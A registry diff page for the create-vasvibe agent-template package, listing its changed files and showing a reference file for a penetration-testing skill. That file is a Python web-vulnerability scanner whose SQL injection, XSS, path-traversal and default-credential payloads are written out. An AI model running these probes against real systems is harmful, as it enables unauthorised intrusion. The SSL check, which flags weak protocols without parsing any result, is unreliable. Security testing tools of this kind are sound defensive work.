create-vasvibe 2.4.0 → 2.5.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (286) hide show
  1. package/README.md +170 -167
  2. package/bin/cli.mjs +9 -9
  3. package/package.json +45 -45
  4. package/src/git.mjs +47 -47
  5. package/src/index.mjs +228 -228
  6. package/src/prompts.mjs +113 -113
  7. package/src/scaffold.mjs +74 -74
  8. package/src/upgrade.mjs +121 -121
  9. package/src/utils.mjs +91 -91
  10. package/template/.agents/agents/analyst/agent.json +43 -43
  11. package/template/.agents/agents/backend/agent.json +44 -44
  12. package/template/.agents/agents/data-architect/agent.json +43 -43
  13. package/template/.agents/agents/devops/agent.json +44 -44
  14. package/template/.agents/agents/discovery/agent.json +43 -43
  15. package/template/.agents/agents/document/agent.json +43 -43
  16. package/template/.agents/agents/fixer/agent.json +44 -44
  17. package/template/.agents/agents/frontend/agent.json +44 -44
  18. package/template/.agents/agents/fullstack/agent.json +44 -44
  19. package/template/.agents/agents/initiator/agent.json +41 -41
  20. package/template/.agents/agents/{explorer → manual-tester}/agent.json +4 -3
  21. package/template/.agents/agents/orchestrator/agent.json +44 -44
  22. package/template/.agents/agents/pm/agent.json +42 -42
  23. package/template/.agents/agents/qa/agent.json +44 -44
  24. package/template/.agents/agents/reliability/agent.json +44 -44
  25. package/template/.agents/agents/security/agent.json +44 -44
  26. package/template/.agents/agents/sysarch/agent.json +44 -44
  27. package/template/.agents/agents/tester/agent.json +44 -44
  28. package/template/.agents/agents/toolsmith/agent.json +44 -44
  29. package/template/.agents/agents/ux-designer/agent.json +43 -43
  30. package/template/.agents/skills/find-skills/SKILL.md +142 -142
  31. package/template/.agents/skills/fullstack/SKILL.md +89 -89
  32. package/template/.agents/skills/penetration-testing/SKILL.md +94 -94
  33. package/template/.agents/skills/penetration-testing/references/automated-penetration-testing-framework.md +328 -328
  34. package/template/.agents/skills/penetration-testing/references/burp-suite-automation-script.md +135 -135
  35. package/template/.agents/skills/penetration-testing/scripts/security-checklist.sh +30 -30
  36. package/template/.agents/skills/pm/SKILL.md +170 -170
  37. package/template/.agents/skills/ui-ux-pro-max/SKILL.md +658 -658
  38. package/template/.agents/skills/ui-ux-pro-max/data/_sync_all.py +414 -414
  39. package/template/.agents/skills/ui-ux-pro-max/data/app-interface.csv +30 -30
  40. package/template/.agents/skills/ui-ux-pro-max/data/design.csv +1775 -1775
  41. package/template/.agents/skills/ui-ux-pro-max/data/draft.csv +1778 -1778
  42. package/template/.agents/skills/ui-ux-pro-max/data/icons.csv +105 -105
  43. package/template/.agents/skills/ui-ux-pro-max/data/products.csv +162 -162
  44. package/template/.agents/skills/ui-ux-pro-max/data/react-performance.csv +45 -45
  45. package/template/.agents/skills/ui-ux-pro-max/data/stacks/angular.csv +51 -51
  46. package/template/.agents/skills/ui-ux-pro-max/data/stacks/astro.csv +54 -54
  47. package/template/.agents/skills/ui-ux-pro-max/data/stacks/flutter.csv +53 -53
  48. package/template/.agents/skills/ui-ux-pro-max/data/stacks/html-tailwind.csv +56 -56
  49. package/template/.agents/skills/ui-ux-pro-max/data/stacks/jetpack-compose.csv +53 -53
  50. package/template/.agents/skills/ui-ux-pro-max/data/stacks/laravel.csv +51 -51
  51. package/template/.agents/skills/ui-ux-pro-max/data/stacks/nextjs.csv +53 -53
  52. package/template/.agents/skills/ui-ux-pro-max/data/stacks/nuxt-ui.csv +51 -51
  53. package/template/.agents/skills/ui-ux-pro-max/data/stacks/nuxtjs.csv +59 -59
  54. package/template/.agents/skills/ui-ux-pro-max/data/stacks/react.csv +54 -54
  55. package/template/.agents/skills/ui-ux-pro-max/data/stacks/shadcn.csv +61 -61
  56. package/template/.agents/skills/ui-ux-pro-max/data/stacks/svelte.csv +54 -54
  57. package/template/.agents/skills/ui-ux-pro-max/data/stacks/swiftui.csv +51 -51
  58. package/template/.agents/skills/ui-ux-pro-max/data/stacks/threejs.csv +54 -54
  59. package/template/.agents/skills/ui-ux-pro-max/data/stacks/vue.csv +50 -50
  60. package/template/.agents/skills/ui-ux-pro-max/data/typography.csv +74 -74
  61. package/template/.agents/skills/ui-ux-pro-max/scripts/core.py +262 -262
  62. package/template/.agents/skills/ui-ux-pro-max/scripts/design_system.py +1148 -1148
  63. package/template/.agents/workflows/build-feature.md +21 -21
  64. package/template/.agents/workflows/daily-standup.md +16 -16
  65. package/template/.agents/workflows/deliver-feature.md +16 -16
  66. package/template/.agents/workflows/harden-release.md +21 -21
  67. package/template/.agents/workflows/plan-project.md +25 -25
  68. package/template/.agents/workflows/release.md +18 -18
  69. package/template/.agents/workflows/security-audit.md +19 -19
  70. package/template/.agents/workflows/setup-workspace.md +21 -21
  71. package/template/.agents/workflows/start-fix.md +17 -18
  72. package/template/.agents/workflows/test-feature.md +17 -17
  73. package/template/.claude/agents/analyst.md +75 -104
  74. package/template/.claude/agents/backend.md +61 -61
  75. package/template/.claude/agents/data-architect.md +43 -43
  76. package/template/.claude/agents/devops.md +44 -43
  77. package/template/.claude/agents/discovery.md +51 -51
  78. package/template/.claude/agents/document.md +51 -51
  79. package/template/.claude/agents/fixer.md +83 -81
  80. package/template/.claude/agents/frontend.md +58 -60
  81. package/template/.claude/agents/fullstack.md +84 -85
  82. package/template/.claude/agents/initiator.md +74 -74
  83. package/template/.claude/agents/manual-tester.md +108 -0
  84. package/template/.claude/agents/orchestrator.md +115 -133
  85. package/template/.claude/agents/pm.md +199 -199
  86. package/template/.claude/agents/qa.md +66 -65
  87. package/template/.claude/agents/reliability.md +48 -47
  88. package/template/.claude/agents/security.md +107 -106
  89. package/template/.claude/agents/sysarch.md +301 -301
  90. package/template/.claude/agents/tester.md +100 -100
  91. package/template/.claude/agents/toolsmith.md +77 -76
  92. package/template/.claude/agents/ux-designer.md +45 -45
  93. package/template/.claude/commands/build-feature.md +22 -22
  94. package/template/.claude/commands/daily-standup.md +16 -16
  95. package/template/.claude/commands/deliver-feature.md +17 -17
  96. package/template/.claude/commands/harden-release.md +22 -22
  97. package/template/.claude/commands/manual-test.md +19 -0
  98. package/template/.claude/commands/plan-project.md +26 -26
  99. package/template/.claude/commands/release.md +19 -19
  100. package/template/.claude/commands/security-audit.md +20 -20
  101. package/template/.claude/commands/setup-workspace.md +22 -22
  102. package/template/.claude/commands/start-fix.md +18 -19
  103. package/template/.claude/commands/test-feature.md +18 -18
  104. package/template/.claude/skills/find-skills +1 -0
  105. package/template/.claude/skills/penetration-testing/SKILL.md +94 -94
  106. package/template/.claude/skills/penetration-testing/references/automated-penetration-testing-framework.md +328 -328
  107. package/template/.claude/skills/penetration-testing/references/burp-suite-automation-script.md +135 -135
  108. package/template/.claude/skills/penetration-testing/scripts/security-checklist.sh +30 -30
  109. package/template/.claude/skills/ui-ux-pro-max/SKILL.md +658 -658
  110. package/template/.claude/skills/ui-ux-pro-max/data/_sync_all.py +414 -414
  111. package/template/.claude/skills/ui-ux-pro-max/data/app-interface.csv +30 -30
  112. package/template/.claude/skills/ui-ux-pro-max/data/design.csv +1775 -1775
  113. package/template/.claude/skills/ui-ux-pro-max/data/draft.csv +1778 -1778
  114. package/template/.claude/skills/ui-ux-pro-max/data/icons.csv +105 -105
  115. package/template/.claude/skills/ui-ux-pro-max/data/products.csv +162 -162
  116. package/template/.claude/skills/ui-ux-pro-max/data/react-performance.csv +45 -45
  117. package/template/.claude/skills/ui-ux-pro-max/data/stacks/angular.csv +51 -51
  118. package/template/.claude/skills/ui-ux-pro-max/data/stacks/astro.csv +54 -54
  119. package/template/.claude/skills/ui-ux-pro-max/data/stacks/flutter.csv +53 -53
  120. package/template/.claude/skills/ui-ux-pro-max/data/stacks/html-tailwind.csv +56 -56
  121. package/template/.claude/skills/ui-ux-pro-max/data/stacks/jetpack-compose.csv +53 -53
  122. package/template/.claude/skills/ui-ux-pro-max/data/stacks/laravel.csv +51 -51
  123. package/template/.claude/skills/ui-ux-pro-max/data/stacks/nextjs.csv +53 -53
  124. package/template/.claude/skills/ui-ux-pro-max/data/stacks/nuxt-ui.csv +51 -51
  125. package/template/.claude/skills/ui-ux-pro-max/data/stacks/nuxtjs.csv +59 -59
  126. package/template/.claude/skills/ui-ux-pro-max/data/stacks/react.csv +54 -54
  127. package/template/.claude/skills/ui-ux-pro-max/data/stacks/shadcn.csv +61 -61
  128. package/template/.claude/skills/ui-ux-pro-max/data/stacks/svelte.csv +54 -54
  129. package/template/.claude/skills/ui-ux-pro-max/data/stacks/swiftui.csv +51 -51
  130. package/template/.claude/skills/ui-ux-pro-max/data/stacks/threejs.csv +54 -54
  131. package/template/.claude/skills/ui-ux-pro-max/data/stacks/vue.csv +50 -50
  132. package/template/.claude/skills/ui-ux-pro-max/data/typography.csv +74 -74
  133. package/template/.claude/skills/ui-ux-pro-max/scripts/core.py +262 -262
  134. package/template/.claude/skills/ui-ux-pro-max/scripts/design_system.py +1148 -1148
  135. package/template/.github/prompts/analyst.prompt.md +58 -104
  136. package/template/.github/prompts/backend.prompt.md +44 -44
  137. package/template/.github/prompts/data-architect.prompt.md +38 -38
  138. package/template/.github/prompts/devops.prompt.md +32 -32
  139. package/template/.github/prompts/discovery.prompt.md +39 -39
  140. package/template/.github/prompts/document.prompt.md +14 -14
  141. package/template/.github/prompts/fixer.prompt.md +91 -81
  142. package/template/.github/prompts/frontend.prompt.md +43 -60
  143. package/template/.github/prompts/fullstack.prompt.md +92 -86
  144. package/template/.github/prompts/initiator.prompt.md +55 -55
  145. package/template/.github/prompts/manual-tester.prompt.md +103 -0
  146. package/template/.github/prompts/orchestrator.prompt.md +75 -133
  147. package/template/.github/prompts/pm.prompt.md +186 -186
  148. package/template/.github/prompts/qa.prompt.md +57 -57
  149. package/template/.github/prompts/reliability.prompt.md +44 -44
  150. package/template/.github/prompts/security.prompt.md +41 -41
  151. package/template/.github/prompts/sysarch.prompt.md +351 -351
  152. package/template/.github/prompts/tester.prompt.md +107 -107
  153. package/template/.github/prompts/toolsmith.prompt.md +46 -46
  154. package/template/.github/prompts/ux-designer.prompt.md +41 -41
  155. package/template/.opencode/agents/analyst.md +75 -104
  156. package/template/.opencode/agents/backend.md +61 -61
  157. package/template/.opencode/agents/data-architect.md +43 -43
  158. package/template/.opencode/agents/devops.md +44 -44
  159. package/template/.opencode/agents/discovery.md +51 -51
  160. package/template/.opencode/agents/document.md +51 -51
  161. package/template/.opencode/agents/fixer.md +83 -81
  162. package/template/.opencode/agents/frontend.md +59 -61
  163. package/template/.opencode/agents/fullstack.md +84 -85
  164. package/template/.opencode/agents/initiator.md +74 -74
  165. package/template/.opencode/agents/manual-tester.md +107 -0
  166. package/template/.opencode/agents/orchestrator.md +116 -131
  167. package/template/.opencode/agents/pm.md +199 -199
  168. package/template/.opencode/agents/qa.md +66 -65
  169. package/template/.opencode/agents/reliability.md +48 -48
  170. package/template/.opencode/agents/security.md +107 -107
  171. package/template/.opencode/agents/sysarch.md +301 -301
  172. package/template/.opencode/agents/tester.md +100 -100
  173. package/template/.opencode/agents/toolsmith.md +77 -77
  174. package/template/.opencode/agents/ux-designer.md +45 -45
  175. package/template/.opencode/commands/build-feature.md +21 -21
  176. package/template/.opencode/commands/daily-standup.md +16 -16
  177. package/template/.opencode/commands/deliver-feature.md +16 -16
  178. package/template/.opencode/commands/harden-release.md +21 -21
  179. package/template/.opencode/commands/manual-test.md +18 -0
  180. package/template/.opencode/commands/plan-project.md +25 -25
  181. package/template/.opencode/commands/release.md +18 -18
  182. package/template/.opencode/commands/security-audit.md +19 -19
  183. package/template/.opencode/commands/setup-workspace.md +21 -21
  184. package/template/.opencode/commands/start-fix.md +17 -18
  185. package/template/.opencode/commands/test-feature.md +17 -17
  186. package/template/.opencode/skills/penetration-testing/SKILL.md +94 -94
  187. package/template/.opencode/skills/penetration-testing/references/automated-penetration-testing-framework.md +328 -328
  188. package/template/.opencode/skills/penetration-testing/references/burp-suite-automation-script.md +135 -135
  189. package/template/.opencode/skills/penetration-testing/scripts/security-checklist.sh +30 -30
  190. package/template/.opencode/skills/ui-ux-pro-max/SKILL.md +658 -658
  191. package/template/.opencode/skills/ui-ux-pro-max/data/_sync_all.py +414 -414
  192. package/template/.opencode/skills/ui-ux-pro-max/data/app-interface.csv +30 -30
  193. package/template/.opencode/skills/ui-ux-pro-max/data/design.csv +1775 -1775
  194. package/template/.opencode/skills/ui-ux-pro-max/data/draft.csv +1778 -1778
  195. package/template/.opencode/skills/ui-ux-pro-max/data/icons.csv +105 -105
  196. package/template/.opencode/skills/ui-ux-pro-max/data/products.csv +162 -162
  197. package/template/.opencode/skills/ui-ux-pro-max/data/react-performance.csv +45 -45
  198. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/angular.csv +51 -51
  199. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/astro.csv +54 -54
  200. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/flutter.csv +53 -53
  201. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/html-tailwind.csv +56 -56
  202. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/jetpack-compose.csv +53 -53
  203. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/laravel.csv +51 -51
  204. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/nextjs.csv +53 -53
  205. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/nuxt-ui.csv +51 -51
  206. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/nuxtjs.csv +59 -59
  207. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/react.csv +54 -54
  208. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/shadcn.csv +61 -61
  209. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/svelte.csv +54 -54
  210. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/swiftui.csv +51 -51
  211. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/threejs.csv +54 -54
  212. package/template/.opencode/skills/ui-ux-pro-max/data/stacks/vue.csv +50 -50
  213. package/template/.opencode/skills/ui-ux-pro-max/data/typography.csv +74 -74
  214. package/template/.opencode/skills/ui-ux-pro-max/scripts/core.py +262 -262
  215. package/template/.opencode/skills/ui-ux-pro-max/scripts/design_system.py +1148 -1148
  216. package/template/AGENT_PERSONAS.md +595 -551
  217. package/template/GIT_STRUCTURE_GUIDE.md +270 -270
  218. package/template/PROJECT_README.example.md +81 -81
  219. package/template/QUICK-START.md +134 -131
  220. package/template/README.md +1942 -1919
  221. package/template/_gitignore +141 -138
  222. package/template/agent/workflows/_shared/change-management.md +70 -70
  223. package/template/agent/workflows/_shared/git-branch-management.md +25 -25
  224. package/template/agent/workflows/_shared/phases.md +88 -88
  225. package/template/agent/workflows/_shared/state-management.md +87 -87
  226. package/template/agent/workflows/_shared/work-depth.md +46 -46
  227. package/template/agent/workflows/analyst.md +75 -104
  228. package/template/agent/workflows/backend.md +61 -61
  229. package/template/agent/workflows/data-architect.md +43 -43
  230. package/template/agent/workflows/devops.md +44 -44
  231. package/template/agent/workflows/discovery.md +51 -51
  232. package/template/agent/workflows/document.md +51 -51
  233. package/template/agent/workflows/fixer.md +83 -81
  234. package/template/agent/workflows/frontend.md +58 -60
  235. package/template/agent/workflows/fullstack.md +84 -86
  236. package/template/agent/workflows/initiator.md +74 -74
  237. package/template/agent/workflows/manual-tester.md +103 -0
  238. package/template/agent/workflows/orchestrator.md +114 -133
  239. package/template/agent/workflows/pm.md +199 -199
  240. package/template/agent/workflows/qa.md +66 -66
  241. package/template/agent/workflows/reliability.md +48 -48
  242. package/template/agent/workflows/security.md +107 -107
  243. package/template/agent/workflows/sysarch.md +301 -301
  244. package/template/agent/workflows/tester.md +100 -100
  245. package/template/agent/workflows/toolsmith.md +77 -77
  246. package/template/agent/workflows/ux-designer.md +45 -45
  247. package/template/codes/.gitkeep +1 -1
  248. package/template/project_overview_example.md +54 -54
  249. package/template/schemas/adr.template.md +36 -36
  250. package/template/schemas/changelog.template.md +34 -34
  251. package/template/schemas/data-model.template.md +57 -57
  252. package/template/schemas/design-system.template.md +63 -63
  253. package/template/schemas/dev_log.template.md +20 -20
  254. package/template/schemas/product-ci.template.yml +50 -50
  255. package/template/schemas/requirements.template.md +64 -64
  256. package/template/schemas/security-standards.template.md +58 -58
  257. package/template/schemas/security_report.template.md +89 -89
  258. package/template/schemas/specification.template.md +57 -71
  259. package/template/schemas/style_guide.template.md +29 -29
  260. package/template/schemas/task_list.template.md +28 -28
  261. package/template/schemas/workspace-manifest.template.json +24 -24
  262. package/template/schemas/workspace-registry.json +94 -95
  263. package/template/skills-lock.json +11 -11
  264. package/template/specifications/.gitkeep +1 -3
  265. package/template/state/knowledge_base/.gitkeep +1 -1
  266. package/template/state/knowledge_base/requirements/.gitkeep +1 -1
  267. package/template/tests/.gitkeep +1 -1
  268. package/template/.agents/agents/logger/agent.json +0 -43
  269. package/template/.agents/workflows/build-prototype.md +0 -32
  270. package/template/.agents/workflows/explorer.md +0 -78
  271. package/template/.agents/workflows/logger.md +0 -117
  272. package/template/.agents/workflows/plan-feature.md +0 -30
  273. package/template/.claude/agents/explorer.md +0 -138
  274. package/template/.claude/agents/logger.md +0 -143
  275. package/template/.claude/commands/build-prototype.md +0 -33
  276. package/template/.claude/commands/plan-feature.md +0 -31
  277. package/template/.claude/settings.local.json +0 -44
  278. package/template/.claude/skills/find-skills/SKILL.md +0 -142
  279. package/template/.github/prompts/explorer.prompt.md +0 -133
  280. package/template/.github/prompts/logger.prompt.md +0 -138
  281. package/template/.opencode/agents/explorer.md +0 -137
  282. package/template/.opencode/agents/logger.md +0 -142
  283. package/template/.opencode/commands/build-prototype.md +0 -32
  284. package/template/.opencode/commands/plan-feature.md +0 -30
  285. package/template/agent/workflows/explorer.md +0 -133
  286. package/template/agent/workflows/logger.md +0 -138
@@ -1,328 +1,328 @@
1
- # Automated Penetration Testing Framework
2
-
3
- ## Automated Penetration Testing Framework
4
-
5
- ```python
6
- # pentest_framework.py
7
- import requests
8
- import socket
9
- import subprocess
10
- import json
11
- from typing import List, Dict
12
- from dataclasses import dataclass, asdict
13
- from datetime import datetime
14
-
15
- @dataclass
16
- class Finding:
17
- severity: str
18
- category: str
19
- target: str
20
- vulnerability: str
21
- evidence: str
22
- remediation: str
23
- cvss_score: float
24
-
25
- class PenetrationTester:
26
- def __init__(self, target: str):
27
- self.target = target
28
- self.findings: List[Finding] = []
29
-
30
- def test_sql_injection(self, url: str) -> None:
31
- """Test for SQL injection vulnerabilities"""
32
- print(f"Testing SQL injection on {url}")
33
-
34
- payloads = [
35
- "' OR '1'='1",
36
- "'; DROP TABLE users--",
37
- "' UNION SELECT NULL, NULL, NULL--",
38
- "1' AND 1=1--",
39
- "admin'--"
40
- ]
41
-
42
- for payload in payloads:
43
- try:
44
- response = requests.get(
45
- url,
46
- params={'id': payload},
47
- timeout=5
48
- )
49
-
50
- # Check for SQL errors
51
- sql_errors = [
52
- 'mysql_fetch_array',
53
- 'SQLServer JDBC Driver',
54
- 'ORA-01756',
55
- 'PostgreSQL',
56
- 'sqlite3.OperationalError'
57
- ]
58
-
59
- for error in sql_errors:
60
- if error in response.text:
61
- self.findings.append(Finding(
62
- severity='critical',
63
- category='SQL Injection',
64
- target=url,
65
- vulnerability=f'SQL Injection detected with payload: {payload}',
66
- evidence=f'Error message: {error}',
67
- remediation='Use parameterized queries or prepared statements',
68
- cvss_score=9.8
69
- ))
70
- break
71
-
72
- except Exception as e:
73
- print(f"Error testing {url}: {e}")
74
-
75
- def test_xss(self, url: str) -> None:
76
- """Test for Cross-Site Scripting vulnerabilities"""
77
- print(f"Testing XSS on {url}")
78
-
79
- payloads = [
80
- "<script>alert('XSS')</script>",
81
- "<img src=x onerror=alert('XSS')>",
82
- "javascript:alert('XSS')",
83
- "<svg onload=alert('XSS')>",
84
- "'-alert('XSS')-'"
85
- ]
86
-
87
- for payload in payloads:
88
- try:
89
- response = requests.get(
90
- url,
91
- params={'q': payload},
92
- timeout=5
93
- )
94
-
95
- if payload in response.text:
96
- self.findings.append(Finding(
97
- severity='high',
98
- category='Cross-Site Scripting',
99
- target=url,
100
- vulnerability=f'Reflected XSS detected with payload: {payload}',
101
- evidence='Payload reflected in response without sanitization',
102
- remediation='Implement output encoding and Content Security Policy',
103
- cvss_score=7.3
104
- ))
105
- break
106
-
107
- except Exception as e:
108
- print(f"Error testing {url}: {e}")
109
-
110
- def test_authentication(self, login_url: str) -> None:
111
- """Test authentication mechanisms"""
112
- print(f"Testing authentication on {login_url}")
113
-
114
- # Test default credentials
115
- default_creds = [
116
- ('admin', 'admin'),
117
- ('admin', 'password'),
118
- ('root', 'root'),
119
- ('administrator', 'administrator')
120
- ]
121
-
122
- for username, password in default_creds:
123
- try:
124
- response = requests.post(
125
- login_url,
126
- data={'username': username, 'password': password},
127
- timeout=5
128
- )
129
-
130
- if response.status_code == 200 and 'dashboard' in response.text.lower():
131
- self.findings.append(Finding(
132
- severity='critical',
133
- category='Weak Authentication',
134
- target=login_url,
135
- vulnerability=f'Default credentials accepted: {username}/{password}',
136
- evidence='Successful authentication with default credentials',
137
- remediation='Enforce strong password policy and remove default accounts',
138
- cvss_score=9.1
139
- ))
140
-
141
- except Exception as e:
142
- print(f"Error testing credentials: {e}")
143
-
144
- def test_security_headers(self, url: str) -> None:
145
- """Test for missing security headers"""
146
- print(f"Testing security headers on {url}")
147
-
148
- try:
149
- response = requests.get(url, timeout=5)
150
-
151
- critical_headers = {
152
- 'Strict-Transport-Security': 'HSTS not implemented',
153
- 'X-Frame-Options': 'Clickjacking protection missing',
154
- 'X-Content-Type-Options': 'MIME sniffing prevention missing',
155
- 'Content-Security-Policy': 'CSP not implemented',
156
- 'X-XSS-Protection': 'XSS protection header missing'
157
- }
158
-
159
- for header, description in critical_headers.items():
160
- if header not in response.headers:
161
- self.findings.append(Finding(
162
- severity='medium',
163
- category='Missing Security Header',
164
- target=url,
165
- vulnerability=f'Missing header: {header}',
166
- evidence=description,
167
- remediation=f'Add {header} header to all responses',
168
- cvss_score=5.3
169
- ))
170
-
171
- except Exception as e:
172
- print(f"Error testing headers: {e}")
173
-
174
- def test_directory_traversal(self, url: str) -> None:
175
- """Test for directory traversal vulnerabilities"""
176
- print(f"Testing directory traversal on {url}")
177
-
178
- payloads = [
179
- '../../../etc/passwd',
180
- '..\\..\\..\\windows\\system32\\drivers\\etc\\hosts',
181
- '....//....//....//etc/passwd',
182
- '%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd'
183
- ]
184
-
185
- for payload in payloads:
186
- try:
187
- response = requests.get(
188
- url,
189
- params={'file': payload},
190
- timeout=5
191
- )
192
-
193
- # Check for Unix passwd file
194
- if 'root:' in response.text or 'daemon:' in response.text:
195
- self.findings.append(Finding(
196
- severity='critical',
197
- category='Directory Traversal',
198
- target=url,
199
- vulnerability=f'Path traversal detected with payload: {payload}',
200
- evidence='System file contents exposed',
201
- remediation='Validate and sanitize file paths, use whitelist approach',
202
- cvss_score=8.6
203
- ))
204
- break
205
-
206
- except Exception as e:
207
- print(f"Error testing traversal: {e}")
208
-
209
- def test_ssl_tls(self) -> None:
210
- """Test SSL/TLS configuration"""
211
- print(f"Testing SSL/TLS on {self.target}")
212
-
213
- try:
214
- result = subprocess.run(
215
- ['testssl.sh', '--jsonfile', 'ssl-results.json', self.target],
216
- capture_output=True,
217
- text=True,
218
- timeout=60
219
- )
220
-
221
- # Parse SSL test results
222
- # This is a simplified check
223
- weak_protocols = ['SSLv2', 'SSLv3', 'TLSv1.0']
224
- for protocol in weak_protocols:
225
- self.findings.append(Finding(
226
- severity='high',
227
- category='Weak SSL/TLS',
228
- target=self.target,
229
- vulnerability=f'Weak protocol enabled: {protocol}',
230
- evidence='Outdated SSL/TLS protocol support',
231
- remediation='Disable weak protocols, enforce TLS 1.2+',
232
- cvss_score=7.5
233
- ))
234
-
235
- except Exception as e:
236
- print(f"SSL test error: {e}")
237
-
238
- def run_full_pentest(self, target_urls: List[str]) -> Dict:
239
- """Execute comprehensive penetration test"""
240
- for url in target_urls:
241
- self.test_sql_injection(url)
242
- self.test_xss(url)
243
- self.test_security_headers(url)
244
- self.test_directory_traversal(url)
245
-
246
- self.test_ssl_tls()
247
-
248
- return self.generate_report()
249
-
250
- def generate_report(self) -> Dict:
251
- """Generate comprehensive pentest report"""
252
- summary = {
253
- 'critical': 0,
254
- 'high': 0,
255
- 'medium': 0,
256
- 'low': 0
257
- }
258
-
259
- for finding in self.findings:
260
- if finding.severity in summary:
261
- summary[finding.severity] += 1
262
-
263
- report = {
264
- 'timestamp': datetime.now().isoformat(),
265
- 'target': self.target,
266
- 'total_findings': len(self.findings),
267
- 'summary': summary,
268
- 'findings': [asdict(f) for f in self.findings],
269
- 'risk_score': self._calculate_risk_score(),
270
- 'recommendations': self._generate_recommendations()
271
- }
272
-
273
- with open('pentest-report.json', 'w') as f:
274
- json.dump(report, f, indent=2)
275
-
276
- return report
277
-
278
- def _calculate_risk_score(self) -> float:
279
- """Calculate overall risk score"""
280
- if not self.findings:
281
- return 0.0
282
-
283
- total_cvss = sum(f.cvss_score for f in self.findings)
284
- return round(total_cvss / len(self.findings), 2)
285
-
286
- def _generate_recommendations(self) -> List[str]:
287
- """Generate prioritized recommendations"""
288
- recommendations = []
289
-
290
- categories = {}
291
- for finding in self.findings:
292
- if finding.category not in categories:
293
- categories[finding.category] = []
294
- categories[finding.category].append(finding)
295
-
296
- for category, findings in sorted(
297
- categories.items(),
298
- key=lambda x: len(x[1]),
299
- reverse=True
300
- ):
301
- recommendations.append(
302
- f"Address {len(findings)} {category} vulnerabilities"
303
- )
304
-
305
- return recommendations[:5]
306
-
307
- # Usage
308
- if __name__ == '__main__':
309
- tester = PenetrationTester('https://example.com')
310
-
311
- target_urls = [
312
- 'https://example.com/api/users',
313
- 'https://example.com/search',
314
- 'https://example.com/download'
315
- ]
316
-
317
- report = tester.run_full_pentest(target_urls)
318
-
319
- print("\n=== Penetration Test Report ===")
320
- print(f"Target: {report['target']}")
321
- print(f"Total Findings: {report['total_findings']}")
322
- print(f"Risk Score: {report['risk_score']}")
323
- print(f"\nFindings by Severity:")
324
- print(f" Critical: {report['summary']['critical']}")
325
- print(f" High: {report['summary']['high']}")
326
- print(f" Medium: {report['summary']['medium']}")
327
- print(f" Low: {report['summary']['low']}")
328
- ```
1
+ # Automated Penetration Testing Framework
2
+
3
+ ## Automated Penetration Testing Framework
4
+
5
+ ```python
6
+ # pentest_framework.py
7
+ import requests
8
+ import socket
9
+ import subprocess
10
+ import json
11
+ from typing import List, Dict
12
+ from dataclasses import dataclass, asdict
13
+ from datetime import datetime
14
+
15
+ @dataclass
16
+ class Finding:
17
+ severity: str
18
+ category: str
19
+ target: str
20
+ vulnerability: str
21
+ evidence: str
22
+ remediation: str
23
+ cvss_score: float
24
+
25
+ class PenetrationTester:
26
+ def __init__(self, target: str):
27
+ self.target = target
28
+ self.findings: List[Finding] = []
29
+
30
+ def test_sql_injection(self, url: str) -> None:
31
+ """Test for SQL injection vulnerabilities"""
32
+ print(f"Testing SQL injection on {url}")
33
+
34
+ payloads = [
35
+ "' OR '1'='1",
36
+ "'; DROP TABLE users--",
37
+ "' UNION SELECT NULL, NULL, NULL--",
38
+ "1' AND 1=1--",
39
+ "admin'--"
40
+ ]
41
+
42
+ for payload in payloads:
43
+ try:
44
+ response = requests.get(
45
+ url,
46
+ params={'id': payload},
47
+ timeout=5
48
+ )
49
+
50
+ # Check for SQL errors
51
+ sql_errors = [
52
+ 'mysql_fetch_array',
53
+ 'SQLServer JDBC Driver',
54
+ 'ORA-01756',
55
+ 'PostgreSQL',
56
+ 'sqlite3.OperationalError'
57
+ ]
58
+
59
+ for error in sql_errors:
60
+ if error in response.text:
61
+ self.findings.append(Finding(
62
+ severity='critical',
63
+ category='SQL Injection',
64
+ target=url,
65
+ vulnerability=f'SQL Injection detected with payload: {payload}',
66
+ evidence=f'Error message: {error}',
67
+ remediation='Use parameterized queries or prepared statements',
68
+ cvss_score=9.8
69
+ ))
70
+ break
71
+
72
+ except Exception as e:
73
+ print(f"Error testing {url}: {e}")
74
+
75
+ def test_xss(self, url: str) -> None:
76
+ """Test for Cross-Site Scripting vulnerabilities"""
77
+ print(f"Testing XSS on {url}")
78
+
79
+ payloads = [
80
+ "<script>alert('XSS')</script>",
81
+ "<img src=x onerror=alert('XSS')>",
82
+ "javascript:alert('XSS')",
83
+ "<svg onload=alert('XSS')>",
84
+ "'-alert('XSS')-'"
85
+ ]
86
+
87
+ for payload in payloads:
88
+ try:
89
+ response = requests.get(
90
+ url,
91
+ params={'q': payload},
92
+ timeout=5
93
+ )
94
+
95
+ if payload in response.text:
96
+ self.findings.append(Finding(
97
+ severity='high',
98
+ category='Cross-Site Scripting',
99
+ target=url,
100
+ vulnerability=f'Reflected XSS detected with payload: {payload}',
101
+ evidence='Payload reflected in response without sanitization',
102
+ remediation='Implement output encoding and Content Security Policy',
103
+ cvss_score=7.3
104
+ ))
105
+ break
106
+
107
+ except Exception as e:
108
+ print(f"Error testing {url}: {e}")
109
+
110
+ def test_authentication(self, login_url: str) -> None:
111
+ """Test authentication mechanisms"""
112
+ print(f"Testing authentication on {login_url}")
113
+
114
+ # Test default credentials
115
+ default_creds = [
116
+ ('admin', 'admin'),
117
+ ('admin', 'password'),
118
+ ('root', 'root'),
119
+ ('administrator', 'administrator')
120
+ ]
121
+
122
+ for username, password in default_creds:
123
+ try:
124
+ response = requests.post(
125
+ login_url,
126
+ data={'username': username, 'password': password},
127
+ timeout=5
128
+ )
129
+
130
+ if response.status_code == 200 and 'dashboard' in response.text.lower():
131
+ self.findings.append(Finding(
132
+ severity='critical',
133
+ category='Weak Authentication',
134
+ target=login_url,
135
